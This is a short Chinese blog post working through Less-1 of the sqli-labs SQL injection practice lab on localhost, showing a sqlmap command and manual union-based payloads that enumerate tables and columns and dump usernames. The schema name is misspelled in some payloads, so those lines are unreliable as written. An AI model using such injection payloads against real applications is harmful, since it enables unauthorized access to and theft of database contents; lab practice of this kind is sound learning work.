• 博客园logo
  • 会员
  • 众包
  • 新闻
  • 博问
  • 闪存
  • 赞助商
  • HarmonyOS
  • Chat2DB
    • 搜索
      所有博客
    • 搜索
      当前博客
  • 写随笔 我的博客 短消息 简洁模式
    用户头像
    我的博客 我的园子 账号设置 会员中心 简洁模式 ... 退出登录
    注册 登录
miniboom
博客园    首页    新随笔    联系   管理    订阅  订阅

Less-1

select name, password from table where id = 14 limit 0,1

sqlmap成功了。

sqlmap -u "http://127.0.0.1:80/Less-1/?id=14" --dbs --random-agent --no-cast --batch -v 3

但是还是手工更能学到东西,手注。

1、确定注入参数是字符型还是数字型注入


这个参数有引号围着,那不用说了,字符型的。

2、确定字段数

这里我尝试了

?id=14' order by 4 --(空格) 没得反应给我

?id=14' order by 4 # 也没得反应给我

看了博客才知道

?id=14' order by 4 --+才是可以用来检测字段数的。

这就是注释的fuzz重要性啊......
把注释的方式都试一遍,才可以说,注释没得用。

3、数据表

payload:
union select 1,(select group_concat(table_name) from information_shcema.tables where table_schema=database()),3 --+

4、列数据

union select 1,(select group_concat(column_name) from information_shcema.columns where table_name='users'),3 --+

5、获取想要的数据

union select 1,(select group_concat(username) from users),3 --+

posted @ 2019-12-03 15:46  miniboom  阅读(181)  评论(0)    收藏  举报
刷新页面返回顶部
博客园  ©  2004-2025
浙公网安备 33010602011771号 浙ICP备2021040463号-3